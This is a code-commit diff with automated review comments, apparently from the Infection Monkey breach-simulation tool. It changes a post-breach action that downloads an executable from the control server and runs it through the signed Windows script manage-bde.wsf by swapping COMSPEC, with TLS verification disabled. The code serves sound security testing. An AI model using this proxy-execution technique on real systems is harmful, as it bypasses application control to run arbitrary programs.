CR changes

This commit is contained in:
Shreya 2020-08-24 18:14:10 +05:30
parent 984a8c2251
commit 989286857b
6 changed files with 33 additions and 17 deletions


@ -0,0 +1 @@
T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download'


@ -2,12 +2,14 @@ import json
import logging
import platform
from socket import gethostname
from urllib.parse import urljoin
import requests
from requests.exceptions import ConnectionError
import infection_monkey.monkeyfs as monkeyfs
import infection_monkey.tunnel as tunnel
from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
from infection_monkey.config import GUID, WormConfiguration
from infection_monkey.network.info import check_internet_access, local_ips
from infection_monkey.transport.http import HTTPConnectProxy
@ -328,7 +330,8 @@ class ControlClient(object):
@staticmethod
def get_T1216_pba_file():
try:
return requests.get("https://%s/api/t1216-pba/download/" % WormConfiguration.current_server, # noqa: DUO123
return requests.get(urljoin(f"https://{WormConfiguration.current_server}/", # noqa: DUO123
T1216_PBA_FILE_DOWNLOAD_PATH),
verify=False,
proxies=ControlClient.proxies,
stream=True)
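Review bot: The response from `requests.get(...)` is returned regardless of its HTTP status, so a 404 or 500 body from the island is handed to the caller exactly like the real payload; the only caller visible in this commit writes `download.content` straight to disk. Bind the response and check it before returning: `response = requests.get(urljoin(...), verify=False, proxies=ControlClient.proxies, stream=True)` followed by `response.raise_for_status()` and `return response`. The `try:` on the line above has its handler outside the hunk, so what the caller receives on failure (presumably `None`) cannot be confirmed here. A one-line docstring such as `"""Fetch the T1216 post-breach executable from the island as a streamed response."""` would also help, since the method name alone does not say what is downloaded.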


@ -1,3 +1,4 @@
import logging
import subprocess
from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC
@ -6,6 +7,8 @@ from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import
cleanup_changes, get_commands_to_proxy_execution_using_signed_script)
from infection_monkey.utils.environment import is_windows_os
LOG = logging.getLogger(__name__)
class SignedScriptProxyExecution(PBA):
def __init__(self):
@ -14,11 +17,14 @@ class SignedScriptProxyExecution(PBA):
windows_cmd=' '.join(windows_cmds))
def run(self):
original_comspec = ''
if is_windows_os():
original_comspec =\
subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116
try:
original_comspec = ''
if is_windows_os():
original_comspec =\
subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116
super().run()
cleanup_changes(original_comspec)
super().run()
except Exception as e:
LOG.warning(f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}")
finally:
cleanup_changes(original_comspec)
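Review bot: The new `except Exception` handler logs only `str(e)` at warning level, so the traceback of a failed PBA run is lost, which makes a failure in `subprocess.check_output`, `super().run()` or the proxy-execution commands hard to diagnose from the agent log. Keeping the message but attaching the exception is a one-line change: `LOG.warning(f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}", exc_info=True)`. Note also that if the COMSPEC read on the Windows branch raises, `finally` still calls `cleanup_changes('')` with the empty placeholder value; whether that is harmless depends on `cleanup_changes`, which is not in this hunk. The decoded `check_output` result still carries its trailing line ending, as it did before this change.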


@ -1,5 +1,4 @@
import os
import subprocess
from infection_monkey.control import ControlClient
@ -8,11 +7,11 @@ TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe')
def get_windows_commands_to_proxy_execution_using_signed_script():
download = ControlClient.get_T1216_pba_file()
with open(TEMP_COMSPEC, 'wb') as file_obj:
file_obj.write(download.content)
file_obj.flush()
with open(TEMP_COMSPEC, 'wb') as random_exe_obj:
random_exe_obj.write(download.content)
random_exe_obj.flush()
windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116
windir_path = os.environ['WINDIR']
signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf')
return [
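Review bot: `random_exe_obj.write(download.content)` writes whatever `get_T1216_pba_file()` returned without checking that it is a successful response, so an error page from the island would be saved as `random_executable.exe` and then run through the signed script; `get_T1216_pba_file` also wraps its request in a `try` whose handler is outside this commit, so `download` may be `None` and the `.content` access would raise `AttributeError`. Add `download.raise_for_status()` before the `with` block (and a `None` guard if the handler returns nothing). Replacing the `echo %WINDIR%` shell-out with `os.environ['WINDIR']` is an improvement, but it raises `KeyError` when the variable is absent; since this function is called from `__init__` rather than from the `try` in `run()`, that would not be caught there. The function's `return [` continues outside the hunk.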


@ -6,6 +6,7 @@ from flask import Flask, Response, send_from_directory
from werkzeug.exceptions import NotFound
import monkey_island.cc.environment.environment_singleton as env_singleton
from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
from monkey_island.cc.database import database, mongo
from monkey_island.cc.resources.attack.attack_config import AttackConfiguration
@ -132,7 +133,7 @@ def init_api_resources(api):
api.add_resource(Log, '/api/log', '/api/log/')
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
api.add_resource(T1216PBAFileDownload, '/api/t1216-pba/download/')
api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH)
api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
'/api/fileUpload/<string:file_type>?load=<string:filename>',
'/api/fileUpload/<string:file_type>?restore=<string:filename>')
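Review bot: The registration now binds only `T1216_PBA_FILE_DOWNLOAD_PATH`, which has no trailing slash, whereas the removed line registered `'/api/t1216-pba/download/'`; with Flask's default strict-slash matching, a request to the old trailing-slash URL (the one agents built before this commit send) will presumably get a 404 rather than the file. The neighbouring `Log` and `IslandLog` resources register both forms, so keep that convention here: `api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH, T1216_PBA_FILE_DOWNLOAD_PATH + '/')`. `init_api_resources` continues outside the hunk.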


@ -8,8 +8,14 @@ __author__ = "shreyamalviya"
class T1216(PostBreachTechnique):
tech_id = "T1216"
unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\
"pre-existing signed script since it didn't run on any Windows machines."
"pre-existing signed script since it didn't run on any Windows machines. " +\
"If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
"bypass application control and signature validation on systems."
scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\
"pre-existing signed script on Windows but failed."
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows."
"pre-existing signed script on Windows but failed. " +\
"If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
"bypass application control and signature validation on systems."
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. " +\
"This behavior could be abused by adversaries to execute malicious files that could " +\
"bypass application control and signature validation on systems."
pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]
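Review bot: The extended `unscanned_msg`, `scanned_msg` and `used_msg` literals are joined with `+\` line continuations; wrapping each assignment's literals in parentheses and relying on implicit adjacent-string concatenation is the idiomatic form and removes both the `+` and the backslashes, e.g. `unscanned_msg = ("Monkey didn't attempt ... machines. "` on one line and `"If successful, ... on systems.")` on the next. The wording itself reads consistently across the three messages. The `T1216` class body continues past the end of the hunk.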